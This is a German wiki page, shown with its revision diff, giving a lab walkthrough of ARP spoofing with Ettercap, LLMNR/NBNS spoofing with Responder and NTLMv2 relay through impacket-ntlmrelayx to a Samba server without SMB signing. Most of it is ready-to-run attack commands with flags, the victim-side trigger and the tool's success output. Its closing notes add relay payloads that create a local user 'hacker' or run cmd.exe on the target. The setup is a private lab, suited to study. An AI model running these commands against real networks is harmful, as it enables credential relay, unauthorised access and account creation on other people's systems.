NTLM-Relay auf Samba-Freigabe mit Impacket: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „= ARP-Spoofing & NTLMv2-Relay gegen SMB-Zielserver = == Zielsetzung == Ein Windows-10-Client (10.0.10.102) wird per ARP-Spoofing in einen Man-in-the-Middle ge…“) |
|||
| Zeile 16: | Zeile 16: | ||
|} | |} | ||
| − | == Vorbereitung == | + | == Vorbereitung auf Kali (10.0.10.101) == |
=== Relay-Verzeichnis erstellen === | === Relay-Verzeichnis erstellen === | ||
* Ein Verzeichnis vorbereiten, das als SMB-Share-Inhalt übergeben wird: | * Ein Verzeichnis vorbereiten, das als SMB-Share-Inhalt übergeben wird: | ||
| Zeile 22: | Zeile 22: | ||
echo "Owned by Kali" > ~/relay-share/pwned.txt | echo "Owned by Kali" > ~/relay-share/pwned.txt | ||
| − | == Angriffsdurchführung == | + | == Angriffsdurchführung auf Kali (10.0.10.101) == |
=== ARP-Spoofing mit Ettercap === | === ARP-Spoofing mit Ettercap === | ||
* Zielgerät in MITM bringen: | * Zielgerät in MITM bringen: | ||
| Zeile 35: | Zeile 35: | ||
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap | impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap | ||
| − | == | + | == Aktion auf dem Windows-Client (10.0.10.102) == |
| − | + | * Windows Explorer öffnen und in die Adresszeile eingeben: | |
| − | |||
\\irgendwas\test | \\irgendwas\test | ||
ODER: | ODER: | ||
| − | + | * In der Eingabeaufforderung ausführen: | |
dir \\irgendeinserver\c$ | dir \\irgendeinserver\c$ | ||
| − | == Ergebnis == | + | == Ergebnis auf Kali (10.0.10.101) == |
* Auf dem SMB-Ziel (10.0.10.104) befindet sich im Share die Datei „pwned.txt“. | * Auf dem SMB-Ziel (10.0.10.104) befindet sich im Share die Datei „pwned.txt“. | ||
* In ntlmrelayx erscheint: | * In ntlmrelayx erscheint: | ||
Version vom 18. Mai 2025, 12:02 Uhr
ARP-Spoofing & NTLMv2-Relay gegen SMB-Zielserver
Zielsetzung
Ein Windows-10-Client (10.0.10.102) wird per ARP-Spoofing in einen Man-in-the-Middle gebracht. Anschließend wird mittels LLMNR/NBNS-Spoofing durch Responder ein NTLMv2-Hash abgefangen und mit ntlmrelayx an einen Samba-Server (10.0.10.104) weitergeleitet, um dort eine Datei hochzuladen.
Umgebung
| System | IP-Adresse | Rolle |
|---|---|---|
| Kali Linux | 10.0.10.101 | Angreifer (Responder, ntlmrelayx, ettercap) |
| Windows 10 | 10.0.10.102 | Opfer (NTLM-fähig, ungehärtet) |
| Samba-Server | 10.0.10.104 | Zielsystem für Relay (kein SMB Signing) |
Vorbereitung auf Kali (10.0.10.101)
Relay-Verzeichnis erstellen
- Ein Verzeichnis vorbereiten, das als SMB-Share-Inhalt übergeben wird:
mkdir -p ~/relay-share echo "Owned by Kali" > ~/relay-share/pwned.txt
Angriffsdurchführung auf Kali (10.0.10.101)
ARP-Spoofing mit Ettercap
- Zielgerät in MITM bringen:
ettercap -Tq -i enp0s3 -M arp:remote /10.0.10.102/ //
Responder starten
- LLMNR/NBNS-Spoofing aktivieren, aber SMB deaktivieren:
responder -I enp0s3 -wrf --no-smb --no-dhcp
ntlmrelayx starten
- Hash wird empfangen und an das Ziel relayed:
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap
Aktion auf dem Windows-Client (10.0.10.102)
- Windows Explorer öffnen und in die Adresszeile eingeben:
\\irgendwas\test
ODER:
- In der Eingabeaufforderung ausführen:
dir \\irgendeinserver\c$
Ergebnis auf Kali (10.0.10.101)
- Auf dem SMB-Ziel (10.0.10.104) befindet sich im Share die Datei „pwned.txt“.
- In ntlmrelayx erscheint:
[*] SMB relay attack successful... [*] Uploaded file pwned.txt to share
Hinweise
- Kein IP-Forwarding notwendig, da Ettercap auf Layer 2 arbeitet.
- Funktioniert nur, wenn SMB-Signing auf dem Ziel deaktiviert ist.
- Kann erweitert werden mit:
--command "net user hacker 1234 /add" oder --command "cmd.exe /c echo PWNED > C:\pwned.txt"